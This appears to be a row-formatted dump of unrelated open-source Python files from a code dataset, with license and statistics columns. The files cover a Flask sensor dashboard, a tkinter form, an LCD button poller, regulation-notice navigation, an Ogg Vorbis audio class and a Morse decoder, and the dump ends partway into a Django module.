| gpl-2.0 | 7,361,009,867,287,362,000 | 33.923729 | 135 | 0.648386 | false | 3.510221 | false | false | false |
caffeinate/test-pylot | pi_fly/web_view.py | 1 | 5556 | '''
Created on 15 Apr 2018
@author: si
'''
from datetime import datetime
from flask import Flask, render_template, current_app, abort, request, make_response, redirect
from flask_sqlalchemy import SQLAlchemy
from pi_fly.actional.abstract import CommsMessage
from pi_fly.devices.abstract import AbstractSensor
from pi_fly.model import Sensor
from pi_fly.web_sessions import valid_session, session_token_create, SESSION_COOKIE_NAME
db = SQLAlchemy()
def create_app(profiles_class, scoreboard):
"""
:param profiles_class (str or class) to Flask settings
:param scoreboard instance of :class:`pi_fly.scoreboard.ScoreBoard`
"""
app = Flask(__name__)
app.config.from_object(profiles_class)
db.init_app(app)
app.sensor_scoreboard = scoreboard
@app.route('/')
def dashboard():
hot_water_sensor_id = "28-0015231007ee"
last_reading = db.session.query(Sensor)\
.order_by(Sensor.last_updated.desc())\
.filter(Sensor.sensor_id == hot_water_sensor_id)\
.first()
if last_reading is None:
return render_template("user_message.html", **{'msg': 'No sensor readings in DB.'})
d = datetime.utcnow() - last_reading.last_updated
minutes_since_reading = d.total_seconds() / 60.
page_vars = {'collection_failure': minutes_since_reading > 10.,
'water_temp': last_reading.value_float,
'bath_possible': last_reading.value_float > 45.,
'last_read_at': last_reading.last_updated,
}
return render_template("dashboard.html", **page_vars)
@app.route('/sensor_scoreboard/')
def sensor_scoreboard():
"""
Show the current values for all input devices in the profile.
"""
# consolidate all sensors on the scoreboard with all input devices listed in
# the profile. Give a warning message when these don't tally.
sensor_values = {k: v for k, v in current_app.sensor_scoreboard.get_all_current_values()}
p = {} # sensor name => {'display_value': '', 'display_class': ''}
for input_device in current_app.config['INPUT_DEVICES']:
assert isinstance(input_device, AbstractSensor)
if input_device.name in sensor_values:
v = sensor_values[input_device.name]
dv = v['value_type'] + ':' + str(v['value_float'])
display = {'display_value': dv,
'display_class': '',
}
p[input_device.name] = display
actional_names = [a.name for a in current_app.config['ACTIONALS']]
for name, values in sensor_values.items():
if name not in p and name not in actional_names:
# in scoreboard but not in config??
p[name] = {'display_value': str(values),
'display_class': 'WARNING',
}
page_vars = dict(sensors=p)
return render_template("sensor_scoreboard.html", **page_vars)
@app.route('/run_command/', methods=['GET', 'POST'])
@valid_session()
def run_actional_command():
"""
GET lists available commands
POST Sends a user selected command to an actional
"""
ac_command = {}
for ac in current_app.config['ACTIONALS']:
ac_command[ac.name] = []
for command_template in ac.available_commands:
cmd_summary = (command_template.command, command_template.description)
ac_command[ac.name].append(cmd_summary)
page_vars = {'actionals_with_commands': ac_command}
if request.method == 'POST':
target_actional = request.values.get('actional_name', None)
target_command = request.values.get('command', None)
if target_actional not in ac_command:
abort(400, "Unknown actional {}".format(target_actional))
try:
actional_comms = scoreboard.get_current_value(target_actional)['comms']
except KeyError:
abort(500, "Actional not found in the scoreboard")
actional_comms.send(CommsMessage(action="command", message=target_command))
msg = "Running....{} .. {}".format(target_actional, target_command)
page_vars['message'] = msg
return render_template("run_command.html", **page_vars)
@app.route('/login/', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
secret_key = current_app.config['SESSION_PASSWORD']
if secret_key is None:
return render_template("user_message.html",
**{'msg': "secret_key hasn't been set."}
), 500
if request.values.get('password', '') != secret_key:
return "Incorrect password", 401
next_hop = request.values.get('next', '')
assert '@' not in next_hop
location = request.host_url + next_hop
response = make_response(redirect(location, code=302))
response.set_cookie(SESSION_COOKIE_NAME,
value=session_token_create(secret_key),
max_age=60 * 60 * 24 * 100, # 100 days
httponly=True
)
return response
return render_template("login.html")
return app
| mit | -6,800,688,278,438,457,000 | 39.26087 | 97 | 0.568754 | false | 4.196375 | true | false | false |
imscs21/myuniv | 1학기/programming/basic/파이썬/파이썬 과제/12/beerclub.py | 1 | 3253 | from tkinter import *
class App(Frame):
def __init__(self, master):
super().__init__(master)
self.pack(padx=20, pady=20)
self.create_widgets()
def create_widgets(self):
Label(self, text="Name").grid(row=0, column=0, sticky=E)
self.name = Entry(self, width=10)
self.name.grid(row=0, column=1)
Label(self, text="Email").grid(row=1, column=0, sticky=E)
self.email = Entry(self, width=10)
self.email.grid(row=1, column=1)
Label(self, text="@smash.ac.kr").grid(row=1, column=2, sticky=W)
self.sex = StringVar()
self.sex.set(None)
Label(self, text="Sex").grid(row=2, column=0, sticky=E)
Radiobutton(self, text='male',
variable=self.sex, value='male'
).grid(row=2, column=1)
Radiobutton(self, text='female',
variable=self.sex, value='female'
).grid(row=2, column=2, sticky=W)
Label(self, text="Favorites").grid(row=3, column=1)
self.lagers = BooleanVar()
Checkbutton(self, text="Lager", variable=self.lagers
).grid(row=4, column=0)
self.wheetbeer = BooleanVar()
Checkbutton(self, text="Wheet Beer", variable=self.wheetbeer
).grid(row=4, column=1)
self.pilsners = BooleanVar()
Checkbutton(self, text="Pilsner", variable=self.pilsners
).grid(row=4, column=2)
self.paleales = BooleanVar()
Checkbutton(self, text="Pale Ale", variable=self.paleales
).grid(row=5, column=0)
self.indiapaleales = BooleanVar()
Checkbutton(self, text="India Pale Ale", variable=self.indiapaleales
).grid(row=5, column=1)
self.stouts = BooleanVar()
Checkbutton(self, text="Stout", variable=self.stouts
).grid(row=5, column=2)
Button(self, text="Register",
command=self.write_summary
).grid(row=6, column=0, columnspan=3, sticky=S)
self.summary = Text(self, width=48, height=10, wrap=WORD)
self.summary.grid(row=7, column=0, columnspan=3, sticky=S)
Button(self, text="Quit", command=self.quit
).grid(row=8, column=0, columnspan=3)
def write_summary(self):
summary = "Name: " + self.name.get() + "\n"
summary += "Email: " + self.email.get() + "@smash.ac.kr\n"
summary += "Sex: " + self.sex.get() + "\n"
summary += "Favorites are: "
if self.lagers.get():
summary += "Lagers, "
if self.wheetbeer.get():
summary += "Wheet Beers, "
if self.pilsners.get():
summary += "Pilsners, "
if self.paleales.get():
summary += "Pale Ales, "
if self.indiapaleales.get():
summary += "India Pale Ales, "
if self.stouts.get():
summary += "Stouts, "
summary += "..."
self.summary.delete(0.0, END)
self.summary.insert(0.0, summary)
# main
root = Tk()
root.title("SMaSH Beer Club")
root.geometry("400x420")
App(root)
root.mainloop()
| apache-2.0 | 7,817,469,158,976,137,000 | 40.177215 | 80 | 0.536121 | false | 3.370984 | false | false | false |
pelme/pyspresso | src/pyspresso/lcd_buttons.py | 1 | 2997 | from itertools import zip_longest
import threading
import time
from ._vendor.Adafruit_CharLCD import Adafruit_CharLCDPlate, SELECT, RIGHT, DOWN, UP, LEFT
def noop():
pass
class LCDButtons:
_lcd = Adafruit_CharLCDPlate()
_io_lock = threading.Lock()
def __init__(self, *, on_up=noop, on_down=noop, on_left=noop, on_right=noop, on_select=noop):
# Make the equality check fail for every character during the initial update
self._old_rows = [
[object()] * 15,
[object()] * 15,
]
self._cursor_col = -1
self._cursor_row = -1
self._on_up = on_up
self._on_down = on_down
self._on_left = on_left
self._on_right = on_right
self._on_select = on_select
self._thread = threading.Thread(target=self._button_thread_watcher,
name='button poller')
self._thread.start()
def _render(self, *, pid):
def fmt(temp):
if temp is not None:
return '{0:.1f}'.format(temp)
else:
return '-'
return [
'{current} / {target} C'.format(current=fmt(pid.temperature_current), target=fmt(pid.temperature_target)),
'{} %'.format(int(pid.duty_cycle * 100))
]
def _set_char(self, col_idx, row_idx, char):
if (self._cursor_col, self._cursor_row) != (col_idx, row_idx):
with self._io_lock:
self._lcd.set_cursor(col_idx, row_idx)
self._cursor_col = col_idx
self._cursor_row = row_idx
with self._io_lock:
self._lcd.message(char)
self._cursor_col += 1
def _update_row(self, row_idx, old_row, new_row):
for col_idx, (old_char, new_char) in enumerate(zip_longest(old_row, new_row, fillvalue=' ')):
if old_char != new_char:
self._set_char(col_idx, row_idx, new_char)
def set_temperature_current(self, temperature):
self.temperature_current = temperature
def update_screen(self, **context):
new_rows = self._render(**context)
for row_idx, (old_row, new_row) in enumerate(zip(self._old_rows, new_rows)):
self._update_row(row_idx, old_row, new_row)
self._old_rows = new_rows
def _button_thread_watcher(self):
buttons = [
(SELECT, self._on_select),
(RIGHT, self._on_right),
(DOWN, self._on_down),
(UP, self._on_up),
(LEFT, self._on_left),
]
pressed_buttons = set()
while True:
for button, func in buttons:
with self._io_lock:
is_pressed = self._lcd.is_pressed(button)
if is_pressed:
pressed_buttons.add(button)
elif not is_pressed and button in pressed_buttons:
pressed_buttons.remove(button)
func()
time.sleep(0.1) | gpl-3.0 | 5,132,360,423,351,799,000 | 28.98 | 118 | 0.533867 | false | 3.681818 | false | false | false |
18F/regulations-site | fr_notices/navigation.py | 2 | 8241 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from collections import namedtuple
import logging
import re
from django.core.urlresolvers import reverse
from regulations.generator.toc import fetch_toc
from regulations.views import utils
logger = logging.getLogger(__name__)
class Title(namedtuple('Title', ['full', 'short', 'subtitle'])):
def __new__(cls, full, short=None, subtitle=None):
"""Adds defaults to constructor"""
return super(Title, cls).__new__(cls, full, short, subtitle)
class NavItem(namedtuple(
'NavItem',
['url', 'title', 'markup_id', 'children', 'category', 'section_id'])):
"""Shared data structure to represent entries in the table of contents and
the navigation in the page footer. We may be able to expand this
standardization more broadly than fr_notices, but let's move one step at a
time.
:type title: Title
:type markup_id: str
:type children: potentially empty list
:type category: str or None
:param str section_id: markup id associated with AJAX and other JS;
temporary shim so that we can turn off AJAX per NavItem. Defaults to
copy the markup_id
"""
def __new__(cls, url, title, markup_id, children=None, category=None,
section_id=None):
"""Adds defaults to constructor"""
if children is None:
children = []
if section_id is None:
section_id = markup_id
return super(NavItem, cls).__new__(
cls, url, title, markup_id, children, category, section_id)
# Properties/fns for backwards compatibility
@property
def markup_prefix(self):
return self.title.short
@property
def sub_label(self):
return self.title.subtitle
def _preamble_titles(node):
"""Hack: Split out navigation title and subtitle from a preamble node.
TODO: Emit these fields in a ToC layer in -parser instead
:param node: a preamble Node (i.e. dict)
:return: pair of (title, sub_title) strings"""
marker = node['label'][-1]
prefix = '{}. '.format(marker.lower())
normalized_title = node['title'].lower()
if normalized_title.startswith(prefix):
title, subtitle = node['title'].split('. ', 1)
return Title(node['title'], title, subtitle)
else:
return Title(node['title'], marker, node['title'])
def make_preamble_nav(nodes, depth=1, max_depth=3):
"""Generate NavItems specific to a notice's preamble.
:type nodes: iterable of Node (a dict)
:param int depth: Current nesting depth of navigation elements
:param int max_depth: We'll stop processing once we reach a certain depth
"""
toc = []
have_titles = [n for n in nodes if n.get('title')]
for node in have_titles:
url = reverse('chrome_preamble',
kwargs={'paragraphs': '/'.join(node['label'][:2])})
# Add a hash to a specific section if we're not linking to the
# top-level entry
if len(node['label']) > 2:
url += '#' + '-'.join(node['label'])
markup_id = '{}-preamble-{}'.format(node['label'][0],
'-'.join(node['label']))
if 'intro' in node['label'] or depth == max_depth:
children = []
else:
children = make_preamble_nav(
node.get('children', []),
depth=depth + 1,
max_depth=max_depth)
toc.append(NavItem(
url=url,
title=_preamble_titles(node),
markup_id=markup_id,
children=children
))
return toc
class CFRChangeBuilder(object):
"""Builds the ToC specific to CFR changes from amendment data. As there is
some valuable state shared between amendment processing, we store it all
in an object"""
def __init__(self):
"""version_info structure: {cfr_part -> {"left": str, "right": str}}
e.g. {"111": {"left": "v1", "right": "v2"},
"222": {"left": "vold", "right": "vnew"}}"""
self.cfr_title = self.cfr_part = self.section = None
self.section_titles = {}
self.toc = []
def add_cfr_part(self, doc_number, version_info, amendment):
"""While processing an amendment, if it refers to a CFR part which
hasn't been seen before, we need to perform some accounting, fetching
related meta data, etc."""
part = amendment['cfr_part']
if part not in version_info:
logger.error("No version info for %s", part)
elif self.cfr_part is None or self.cfr_part != amendment['cfr_part']:
meta = utils.regulation_meta(part, version_info[part]['right'])
flat_toc = fetch_toc(part, version_info[part]['right'],
flatten=True)
self.section_titles = {
elt['index'][1]: elt['title']
for elt in flat_toc if len(elt['index']) == 2}
self.cfr_part = part
self.cfr_title = meta.get('cfr_title_number')
self.section = None
title = '{} CFR {}'.format(self.cfr_title, part)
markup_id = '{}-cfr-{}'.format(doc_number, part)
self.toc.append(NavItem(
url=reverse('cfr_changes', kwargs={
'doc_number': doc_number, 'section': part}),
title=Title('Authority', title, 'Authority'),
markup_id=markup_id,
category=title,
section_id='')) # disable AJAX
_cfr_re = re.compile(r'(§ [\d.]+) (.*)')
def _change_title(self, section):
if section not in self.section_titles:
logger.error("Could not find section title for %s", section)
title_str = self.section_titles.get(section, '')
# Hack: Reconstitute node prefix and title
# TODO: Emit these fields in a ToC layer in -parser instead
match = self._cfr_re.search(title_str)
if match:
return Title(title_str, *match.groups())
else:
return Title(title_str, title_str)
def add_change(self, doc_number, label_parts):
"""While processing an amendment, we will encounter sections we
haven't seen before -- these will ultimately be ToC entries"""
change_section = label_parts[1]
is_subpart = 'Subpart' in label_parts or 'Subjgrp' in label_parts
if not is_subpart and (self.section is None or
self.section != change_section):
self.section = change_section
section = '-'.join(label_parts[:2])
self.toc.append(NavItem(
url=reverse('cfr_changes', kwargs={
'doc_number': doc_number,
'section': section}),
title=self._change_title(change_section),
markup_id='{}-cfr-{}'.format(doc_number, section),
category='{} CFR {}'.format(self.cfr_title, self.cfr_part)
))
def make_cfr_change_nav(doc_number, version_info, amendments):
"""Soup to nuts conversion from a document number to a table of contents
list"""
builder = CFRChangeBuilder()
for amendment in amendments:
# Amendments are of the form
# {'cfr_part': 111, 'instruction': 'text1', 'authority': 'text2'} or
# {'cfr_part': 111, 'instruction': 'text3',
# 'changes': [['111-22-c', [data1]], ['other', [data2]]}
builder.add_cfr_part(doc_number, version_info, amendment)
for change_label, _ in amendment.get('changes', []):
builder.add_change(doc_number, change_label.split('-'))
return builder.toc
def footer(preamble_toc, cfr_toc, full_id):
"""Generate "navigation" context which allows the user to move between
sections in the footer"""
items = preamble_toc + cfr_toc
nav = {'previous': None, 'next': None, 'page_type': 'preamble-section'}
for idx, item in enumerate(items):
if item.markup_id == full_id:
if idx > 0:
nav['previous'] = items[idx - 1]
if idx < len(items) - 1:
nav['next'] = items[idx + 1]
return nav
| cc0-1.0 | -783,655,856,690,520,600 | 38.052133 | 78 | 0.57949 | false | 3.886792 | false | false | false |
tuffy/python-audio-tools | audiotools/vorbis.py | 1 | 20653 | # Audio Tools, a module and set of tools for manipulating audio data
# Copyright (C) 2007-2016 Brian Langenberger
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
from audiotools import (AudioFile, InvalidFile, ChannelMask)
class InvalidVorbis(InvalidFile):
pass
class VorbisAudio(AudioFile):
"""an Ogg Vorbis file"""
from audiotools.text import (COMP_VORBIS_0,
COMP_VORBIS_10)
SUFFIX = "ogg"
NAME = SUFFIX
DESCRIPTION = u"Ogg Vorbis"
DEFAULT_COMPRESSION = "3"
COMPRESSION_MODES = tuple([str(i) for i in range(0, 11)])
COMPRESSION_DESCRIPTIONS = {"0": COMP_VORBIS_0,
"10": COMP_VORBIS_10}
def __init__(self, filename):
"""filename is a plain string"""
AudioFile.__init__(self, filename)
self.__sample_rate__ = 0
self.__channels__ = 0
try:
self.__read_identification__()
except IOError as msg:
raise InvalidVorbis(str(msg))
def __read_identification__(self):
from audiotools.bitstream import BitstreamReader
with BitstreamReader(open(self.filename, "rb"), True) as ogg_reader:
(magic_number,
version,
header_type,
granule_position,
self.__serial_number__,
page_sequence_number,
checksum,
segment_count) = ogg_reader.parse("4b 8u 8u 64S 32u 32u 32u 8u")
if magic_number != b'OggS':
from audiotools.text import ERR_OGG_INVALID_MAGIC_NUMBER
raise InvalidVorbis(ERR_OGG_INVALID_MAGIC_NUMBER)
if version != 0:
from audiotools.text import ERR_OGG_INVALID_VERSION
raise InvalidVorbis(ERR_OGG_INVALID_VERSION)
segment_length = ogg_reader.read(8)
(vorbis_type,
header,
version,
self.__channels__,
self.__sample_rate__,
maximum_bitrate,
nominal_bitrate,
minimum_bitrate,
blocksize0,
blocksize1,
framing) = ogg_reader.parse(
"8u 6b 32u 8u 32u 32u 32u 32u 4u 4u 1u")
if vorbis_type != 1:
from audiotools.text import ERR_VORBIS_INVALID_TYPE
raise InvalidVorbis(ERR_VORBIS_INVALID_TYPE)
if header != b'vorbis':
from audiotools.text import ERR_VORBIS_INVALID_HEADER
raise InvalidVorbis(ERR_VORBIS_INVALID_HEADER)
if version != 0:
from audiotools.text import ERR_VORBIS_INVALID_VERSION
raise InvalidVorbis(ERR_VORBIS_INVALID_VERSION)
if framing != 1:
from audiotools.text import ERR_VORBIS_INVALID_FRAMING_BIT
raise InvalidVorbis(ERR_VORBIS_INVALID_FRAMING_BIT)
def lossless(self):
"""returns False"""
return False
def bits_per_sample(self):
"""returns an integer number of bits-per-sample this track contains"""
return 16
def channels(self):
"""returns an integer number of channels this track contains"""
return self.__channels__
def channel_mask(self):
"""returns a ChannelMask object of this track's channel layout"""
if self.channels() == 1:
return ChannelMask.from_fields(
front_center=True)
elif self.channels() == 2:
return ChannelMask.from_fields(
front_left=True, front_right=True)
elif self.channels() == 3:
return ChannelMask.from_fields(
front_left=True, front_right=True,
front_center=True)
elif self.channels() == 4:
return ChannelMask.from_fields(
front_left=True, front_right=True,
back_left=True, back_right=True)
elif self.channels() == 5:
return ChannelMask.from_fields(
front_left=True, front_right=True,
front_center=True,
back_left=True, back_right=True)
elif self.channels() == 6:
return ChannelMask.from_fields(
front_left=True, front_right=True,
front_center=True,
back_left=True, back_right=True,
low_frequency=True)
elif self.channels() == 7:
return ChannelMask.from_fields(
front_left=True, front_right=True,
front_center=True,
side_left=True, side_right=True,
back_center=True, low_frequency=True)
elif self.channels() == 8:
return ChannelMask.from_fields(
front_left=True, front_right=True,
side_left=True, side_right=True,
back_left=True, back_right=True,
front_center=True, low_frequency=True)
else:
return ChannelMask(0)
def total_frames(self):
"""returns the total PCM frames of the track as an integer"""
from audiotools._ogg import PageReader
try:
with PageReader(open(self.filename, "rb")) as reader:
page = reader.read()
pcm_samples = page.granule_position
while not page.stream_end:
page = reader.read()
pcm_samples = max(pcm_samples, page.granule_position)
return pcm_samples
except (IOError, ValueError):
return 0
def sample_rate(self):
"""returns the rate of the track's audio as an integer number of Hz"""
return self.__sample_rate__
@classmethod
def supports_to_pcm(cls):
"""returns True if all necessary components are available
to support the .to_pcm() method"""
try:
from audiotools.decoders import VorbisDecoder
return True
except ImportError:
return False
def to_pcm(self):
"""returns a PCMReader object containing the track's PCM data"""
from audiotools.decoders import VorbisDecoder
try:
return VorbisDecoder(self.filename)
except ValueError as err:
from audiotools import PCMReaderError
return PCMReaderError(str(err),
self.sample_rate(),
self.channels(),
int(self.channel_mask()),
self.bits_per_sample())
@classmethod
def supports_from_pcm(cls):
"""returns True if all necessary components are available
to support the .from_pcm() classmethod"""
try:
from audiotools.encoders import encode_vorbis
return True
except ImportError:
return False
@classmethod
def from_pcm(cls, filename, pcmreader,
compression=None, total_pcm_frames=None):
"""encodes a new file from PCM data
takes a filename string, PCMReader object,
optional compression level string and
optional total_pcm_frames integer
encodes a new audio file from pcmreader's data
at the given filename with the specified compression level
and returns a new VorbisAudio object"""
from audiotools import (BufferedPCMReader,
__default_quality__,
EncodingError)
from audiotools.encoders import encode_vorbis
if (((compression is None) or
(compression not in cls.COMPRESSION_MODES))):
compression = __default_quality__(cls.NAME)
if pcmreader.bits_per_sample not in {8, 16, 24}:
from audiotools import UnsupportedBitsPerSample
pcmreader.close()
raise UnsupportedBitsPerSample(filename, pcmreader.bits_per_sample)
if (pcmreader.channels > 2) and (pcmreader.channels <= 8):
channel_mask = int(pcmreader.channel_mask)
if ((channel_mask != 0) and
(channel_mask not in
(0x7, # FR, FC, FL
0x33, # FR, FL, BR, BL
0x37, # FR, FC, FL, BL, BR
0x3f, # FR, FC, FL, BL, BR, LFE
0x70f, # FL, FC, FR, SL, SR, BC, LFE
0x63f))): # FL, FC, FR, SL, SR, BL, BR, LFE
from audiotools import UnsupportedChannelMask
pcmreader.close()
raise UnsupportedChannelMask(filename, channel_mask)
if total_pcm_frames is not None:
from audiotools import CounterPCMReader
pcmreader = CounterPCMReader(pcmreader)
try:
encode_vorbis(filename,
pcmreader,
float(compression) / 10)
if ((total_pcm_frames is not None) and
(total_pcm_frames != pcmreader.frames_written)):
from audiotools.text import ERR_TOTAL_PCM_FRAMES_MISMATCH
cls.__unlink__(filename)
raise EncodingError(ERR_TOTAL_PCM_FRAMES_MISMATCH)
return VorbisAudio(filename)
except (ValueError, IOError) as err:
cls.__unlink__(filename)
raise EncodingError(str(err))
finally:
pcmreader.close()
def update_metadata(self, metadata):
"""takes this track's current MetaData object
as returned by get_metadata() and sets this track's metadata
with any fields updated in that object
raises IOError if unable to write the file
"""
import os
from audiotools import TemporaryFile
from audiotools.ogg import (PageReader,
PacketReader,
PageWriter,
packet_to_pages,
packets_to_pages)
from audiotools.vorbiscomment import VorbisComment
from audiotools.bitstream import BitstreamRecorder
if metadata is None:
return
elif not isinstance(metadata, VorbisComment):
from audiotools.text import ERR_FOREIGN_METADATA
raise ValueError(ERR_FOREIGN_METADATA)
elif not os.access(self.filename, os.W_OK):
raise IOError(self.filename)
original_ogg = PacketReader(PageReader(open(self.filename, "rb")))
new_ogg = PageWriter(TemporaryFile(self.filename))
sequence_number = 0
# transfer current file's identification packet in its own page
identification_packet = original_ogg.read_packet()
for (i, page) in enumerate(packet_to_pages(
identification_packet,
self.__serial_number__,
starting_sequence_number=sequence_number)):
page.stream_beginning = (i == 0)
new_ogg.write(page)
sequence_number += 1
# discard the current file's comment packet
comment_packet = original_ogg.read_packet()
# generate new comment packet
comment_writer = BitstreamRecorder(True)
comment_writer.build("8u 6b", (3, b"vorbis"))
vendor_string = metadata.vendor_string.encode('utf-8')
comment_writer.build("32u {:d}b".format(len(vendor_string)),
(len(vendor_string), vendor_string))
comment_writer.write(32, len(metadata.comment_strings))
for comment_string in metadata.comment_strings:
comment_string = comment_string.encode('utf-8')
comment_writer.build("32u {:d}b".format(len(comment_string)),
(len(comment_string), comment_string))
comment_writer.build("1u a", (1,)) # framing bit
# transfer codebooks packet from original file to new file
codebooks_packet = original_ogg.read_packet()
for page in packets_to_pages(
[comment_writer.data(), codebooks_packet],
self.__serial_number__,
starting_sequence_number=sequence_number):
new_ogg.write(page)
sequence_number += 1
# transfer remaining pages after re-sequencing
page = original_ogg.read_page()
page.sequence_number = sequence_number
page.bitstream_serial_number = self.__serial_number__
sequence_number += 1
new_ogg.write(page)
while not page.stream_end:
page = original_ogg.read_page()
page.sequence_number = sequence_number
page.bitstream_serial_number = self.__serial_number__
sequence_number += 1
new_ogg.write(page)
original_ogg.close()
new_ogg.close()
def set_metadata(self, metadata):
"""takes a MetaData object and sets this track's metadata
this metadata includes track name, album name, and so on
raises IOError if unable to write the file"""
from audiotools.vorbiscomment import VorbisComment
if metadata is None:
return self.delete_metadata()
metadata = VorbisComment.converted(metadata)
old_metadata = self.get_metadata()
metadata.vendor_string = old_metadata.vendor_string
# remove REPLAYGAIN_* tags from new metadata (if any)
for key in [u"REPLAYGAIN_TRACK_GAIN",
u"REPLAYGAIN_TRACK_PEAK",
u"REPLAYGAIN_ALBUM_GAIN",
u"REPLAYGAIN_ALBUM_PEAK",
u"REPLAYGAIN_REFERENCE_LOUDNESS"]:
try:
metadata[key] = old_metadata[key]
except KeyError:
metadata[key] = []
self.update_metadata(metadata)
@classmethod
def supports_metadata(cls):
"""returns True if this audio type supports MetaData"""
return True
def get_metadata(self):
"""returns a MetaData object, or None
raises IOError if unable to read the file"""
from io import BytesIO
from audiotools.bitstream import BitstreamReader
from audiotools.ogg import PacketReader, PageReader
from audiotools.vorbiscomment import VorbisComment
with PacketReader(PageReader(open(self.filename, "rb"))) as reader:
identification = reader.read_packet()
comment = BitstreamReader(BytesIO(reader.read_packet()), True)
(packet_type, packet_header) = comment.parse("8u 6b")
if (packet_type == 3) and (packet_header == b'vorbis'):
vendor_string = \
comment.read_bytes(comment.read(32)).decode('utf-8')
comment_strings = [
comment.read_bytes(comment.read(32)).decode('utf-8')
for i in range(comment.read(32))]
if comment.read(1) == 1: # framing bit
return VorbisComment(comment_strings, vendor_string)
else:
return None
else:
return None
def delete_metadata(self):
"""deletes the track's MetaData
this removes or unsets tags as necessary in order to remove all data
raises IOError if unable to write the file"""
from audiotools import MetaData
# the vorbis comment packet is required,
# so simply zero out its contents
self.set_metadata(MetaData())
@classmethod
def supports_replay_gain(cls):
"""returns True if this class supports ReplayGain"""
return True
def get_replay_gain(self):
"""returns a ReplayGain object of our ReplayGain values
returns None if we have no values"""
from audiotools import ReplayGain
vorbis_metadata = self.get_metadata()
if ((vorbis_metadata is not None) and
({u'REPLAYGAIN_TRACK_PEAK',
u'REPLAYGAIN_TRACK_GAIN',
u'REPLAYGAIN_ALBUM_PEAK',
u'REPLAYGAIN_ALBUM_GAIN'}.issubset(vorbis_metadata.keys()))):
# we have ReplayGain data
try:
return ReplayGain(
vorbis_metadata[u'REPLAYGAIN_TRACK_GAIN'][0][0:-len(u" dB")],
vorbis_metadata[u'REPLAYGAIN_TRACK_PEAK'][0],
vorbis_metadata[u'REPLAYGAIN_ALBUM_GAIN'][0][0:-len(u" dB")],
vorbis_metadata[u'REPLAYGAIN_ALBUM_PEAK'][0])
except (IndexError, ValueError):
return None
else:
return None
def set_replay_gain(self, replaygain):
"""given a ReplayGain object, sets the track's gain to those values
may raise IOError if unable to modify the file"""
if replaygain is None:
return self.delete_replay_gain()
vorbis_comment = self.get_metadata()
if vorbis_comment is None:
from audiotools.vorbiscomment import VorbisComment
from audiotools import VERSION
vorbis_comment = VorbisComment(
[], u"Python Audio Tools {}".format(VERSION))
vorbis_comment[u"REPLAYGAIN_TRACK_GAIN"] = [
u"{:.2f} dB".format(replaygain.track_gain)]
vorbis_comment[u"REPLAYGAIN_TRACK_PEAK"] = [
u"{:.8f}".format(replaygain.track_peak)]
vorbis_comment[u"REPLAYGAIN_ALBUM_GAIN"] = [
u"{:.2f} dB".format(replaygain.album_gain)]
vorbis_comment[u"REPLAYGAIN_ALBUM_PEAK"] = [
u"{:.8f}".format(replaygain.album_peak)]
vorbis_comment[u"REPLAYGAIN_REFERENCE_LOUDNESS"] = [u"89.0 dB"]
self.update_metadata(vorbis_comment)
def delete_replay_gain(self):
"""removes ReplayGain values from file, if any
may raise IOError if unable to modify the file"""
vorbis_comment = self.get_metadata()
if vorbis_comment is not None:
for field in [u"REPLAYGAIN_TRACK_GAIN",
u"REPLAYGAIN_TRACK_PEAK",
u"REPLAYGAIN_ALBUM_GAIN",
u"REPLAYGAIN_ALBUM_PEAK",
u"REPLAYGAIN_REFERENCE_LOUDNESS"]:
try:
del(vorbis_comment[field])
except KeyError:
pass
self.update_metadata(vorbis_comment)
class VorbisChannelMask(ChannelMask):
"""the Vorbis-specific channel mapping"""
def __repr__(self):
return "VorbisChannelMask({})".format(
",".join(["{}={}".format(field, getattr(self, field))
for field in self.SPEAKER_TO_MASK.keys()
if (getattr(self, field))]))
def channels(self):
"""returns a list of speaker strings this mask contains
returned in the order in which they should appear
in the PCM stream
"""
count = len(self)
if count == 1:
return ["front_center"]
elif count == 2:
return ["front_left", "front_right"]
elif count == 3:
return ["front_left", "front_center", "front_right"]
elif count == 4:
return ["front_left", "front_right",
"back_left", "back_right"]
elif count == 5:
return ["front_left", "front_center", "front_right",
"back_left", "back_right"]
elif count == 6:
return ["front_left", "front_center", "front_right",
"back_left", "back_right", "low_frequency"]
elif count == 7:
return ["front_left", "front_center", "front_right",
"side_left", "side_right", "back_center",
"low_frequency"]
elif count == 8:
return ["front_left", "front_center", "front_right",
"side_left", "side_right",
"back_left", "back_right", "low_frequency"]
else:
return []
| gpl-2.0 | -6,530,508,446,178,070,000 | 35.946333 | 81 | 0.566697 | false | 4.173166 | false | false | false |
SylvainDe/morse-talk | morse_talk/decoding.py | 1 | 1432 | """
Functions to decode messages
"""
# Copyright (C) 2015 by
# Himanshu Mishra <[email protected]>
# All rights reserved.
# GNU license.
from . import encoding
__all__ = ['decode']
def decode(code, encoding_type='default'):
"""Converts a string of morse code into English message
The encoded message can also be decoded using the same morse chart
backwards.
"""
reversed_morsetab = {symbol: character for character,
symbol in list(getattr(encoding, 'morsetab').items())}
if encoding_type == 'default':
# For spacing the words
letters = 0
words = 0
index = {}
for i in range(len(code)):
if code[i: i+3] == ' ':
if code[i: i+7] == ' ':
words += 1
letters += 1
index[words] = letters
elif code[i+4] and code[i-1] != ' ': # Check for ' '
letters += 1
message = [reversed_morsetab[i] for i in code.split()]
for i, (word, letter) in enumerate(list(index.items())):
message.insert(letter + i, ' ')
return ''.join(message)
if encoding_type == 'binary':
return ('Sorry, but it seems that binary encodings can have multiple'
' messages. So for now, we couldn\'t show even one of them.')
| gpl-2.0 | -3,792,566,459,160,271,400 | 29.468085 | 79 | 0.521648 | false | 4.056657 | false | false | false |
demdxx/django-cors-atomregister | corsatomregister/patching.py | 1 | 2886 | import sys
from django.db import models
from django.core.signals import request_started
from django.db.models import signals
from django.utils.importlib import import_module
from .utils import register, unregister, isregister, countregister, get_users
def import_class(module, class_name):
return getattr(import_module(module),class_name)
def monkey(model, info):
# Init base params
code = info.get('code', 1)
unique = info.get('unique', True)
methods = info.get('names')
positive_only = info.get('positive_only', False)
counter_field = info.get('counter_field', None)
if isinstance(methods,basestring):
